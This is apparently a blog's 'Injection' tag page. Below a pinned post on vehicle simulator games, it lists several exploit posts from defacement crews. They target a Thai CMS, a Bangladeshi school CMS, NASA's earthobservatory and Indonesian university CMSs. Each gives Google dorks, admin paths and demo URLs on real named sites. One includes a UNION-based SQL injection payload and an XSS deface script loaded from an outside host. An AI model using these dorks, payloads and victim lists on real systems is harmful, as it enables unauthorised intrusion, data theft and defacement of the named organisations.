Langsung ke konten utama

Postingan

Menampilkan postingan dengan label Injection

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Sekarang, banyak sekali jenis game online bertebaran. Mulai MMORPG sampai dengan Game Simulation atau yang lebih familiar dikenal game simulator. Belakangan yang banyak dimainkan adalah game simulator yang menawarkan pengalaman melakukan aktivitas dengan simulasi. Ada yang life-simulation games, vehicle simulation, dan masih banyak lagi lainnya. Tahun 2020 ini juga banyak bermunculan game simulator yang tidak kalah seru dari sebelum-sebelumnya. Bagi yang sedang mencari rekomendasi, berikut ini akan adalah daftar game simulator patut dicoba yang pertama, Bus Simulator Indonesia Pertama datang dari Tanah Air ada yang namanya Bus Simulator Indonesia atau biasa disingkat BUSSID. Game ini cocok sekali bagi yang ingin merasakan sensasi supir bus Indonesia apalagi bila menginstall mod yang didapat dari anonytun.com, di sana Anda bisa mendapatkan banyak pilihan bus, truk dan mobil yang seru secara gratis. A da simulasi bus antarkota, antarprovinsi,  bahkan antar pulau. Karena ada fi...

บ้านเว็บไซต์ cms sql injection

| Exploit Title: บ้านเว็บไซต์ cms sql injection | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://www.baanwebsite.com | | Google Dork : intext:"Powered by บ้านเว็บไซต์" inurl:view.php?id= | | Tested on: Windows 10 ~~~> Google Chrome | | vulnerable file : /view.php | | ADMIN PAGE : target/admin | | Date: 2017/25/10 |==========================================================| | | Proof : | | http://www.cho-runglert.co.th/career/view.php?id=10 | | http://www.thebestpropertygroup.com/project/view.php?id=1 | | http://www.nyexpert87.com/products/view.php?id=46 | | http://www.ap-interpolymers.com/news/view.php?id=20 | | http://www.factorydesign.co.th/portfolio/view.php?id=31 | | http://www.phusandao.com/attractions/view.php?id=22 | | http://www.dusadee1992.com/products/view.php?id=18

WAN IT LTD - SQLInjection / XSS / JSDeface

#Title: WAN IT LTD SQl/XSS Deface #Dork: intext:"WAN IT LTD" inurl:"id=" +"site:edu.bd" #Date: 26.10.2017 #Test: W10 #CWEs: CWE-89 #Exploit Discovered By: Informacion - Anonymous #Author: mr.Gh0st N@0b  #======================# #P00f: #http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject} |--- Parameter: id (GET) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: menu=aboutus&id=-8681' UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x67 495a756b546c697068424a6759715a545a4a4255787748667350656953787a65746450734b4e6f,0x7 16a7a7171)-- Satn Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT] ---| #Admin Panel #http://site.com/admin/ {login Here} #Dem0s:  #http://sonarhatsnc.edu.bd/about_us.php… #http://rwahs.edu.bd/ #http://rwahs.edu.bd/ #http://www.gozkhalimlths.edu.bd/ #http://coghighschool.edu.bd/ #XSS Alert #/admin/add_news.php?menu=news {Exploit XSS Script} #Example #<script src="http://yourdeface....

NASA earthobservatory Blind SQL Injection

----------------------------------------------------------------------------------------- | Exploit Title : NASA Blind SQL Injection | Google Dork : site:nasa.gov inurl:.view.php?id= | Date : 15/09/2017 | Exploit Author : nasa.gov | Vendor Homepage : nasa.gov | Software Link : nasa.gov | Version : 1.0 | Tested on : Windows10 , Firefox | |+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ | | | Proof of concept : NASA Blind SQL Injection | | 1 - Search this Google Dork : site:nasa.gov inurl:.view.php?id= | 2 - Find The ( earthobservatory ) Subdomain of NASA | 3 - True Site : ( https://earthobservatory.nasa.gov ) | 4 - Now , We Have a website with low security ! :) | 5 - This Site is using ( PHP Programming Lang ) Ver : 5 | Without Security measures ! | 6 - Step 1 : Test SQL Injection VULNERABILITY , with add ( " or ' ) end of number value in url Like : [ view.php?id=4215' ] | 7 - Step 2 : May you receive unknown errors , Like : 404 , Forbidden , You have no...

UPT Pusat Data dan Informasi © 2013 SQLi Vulnerability

+++++++++++++++++++++++++ Google Dork : intext:"Developed by UPT Pusat Data dan Informasi © 2013" Tested on : Windows - Havij 1.16 Pro ******************************************** [+] Dorking in google or other search engine [+] Go to SQL injection link : http://www.site.com/cms//index.php?act=editkelompok&kelompok=0 [+] Go to the admin panel : http://www.site.com/path/cms//index.php?act=editkelompok&kelompok=0 ******************************************** DEMO : http://kknonline.unmuhjember.ac.id/index.php?act=editkelompok&kelompok=0 ******************************************** Berandal | OWL SQUAD

Universitas Pendidikan Ganesha CMS SQLi Vulnerability

+++++++++++++++++++++++++ Google Dork : intext:"Copyright © 2011 Universitas Pendidikan Ganesha" Tested on : Windows - Havij 1.16 Pro ******************************************** [+] Dorking in google or other search engine [+] Go to SQL injection link : http://www.site.com/cms/index.php?c=Kontak&md=mn&kid=1413 [+] Go to the admin panel : http://www.site.com/path/cms/index.php?c=Kontak&md=mn&kid=1413 ******************************************** DEMO : http://adikpapua.undiksha.ac.id/index.php?c=Kontak&md=mn&kid=1413 ******************************************** ~ \ We Are / ~ Artefvcker | Arrownonymous | Berandal | Blck0Wl? | Clutzsec | GoC_X | k4luga | KxK_PrajurID ShoursCout | WoNg_Nd35O | Yonkou4 | ZEUS | 0wLCulun | "Samael" | ./ARMVXO